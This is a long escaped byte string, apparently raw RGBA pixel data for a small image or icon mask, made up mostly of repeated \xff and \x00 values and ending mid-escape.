\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xce\x00b\xff4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff4\x00b\xff\xcd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffq\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00c\xff\xaf\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffq\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00c\xff\xaf\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xb1\x00j\xff\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x1d\x00c\xff\xb1\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffO\x00b\xff\xe2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00e\xffQ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\xffQ\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe2\x00d\xffO\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfd\x00b\xff\x91\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00b\xff\x8f\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00b\xff\x91\x00c\xff\xfd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00b\xff\x8f\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xcd\x00b\xff4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffO\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00d\xffO\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff4\x00b\xff\xcd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00f\xff2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf2\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffq\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00c\xff\xaf\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xb0\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00d\xffp\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf2\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00b\xff\xae\x00c\xff\xb1\x00j\xff\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x1d\x00c\xff\xb0\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff3\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00c\xff\x90\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffO\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00c\xffP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffO\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00c\xffP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00c\xff\x90\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00d\xffp\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00c\xff\xaf\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xb0\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffO\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00c\xffP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00c\xff\x90\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff3\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00d\xffp\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00c\xff\xaf\x00c\xff\xb0\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0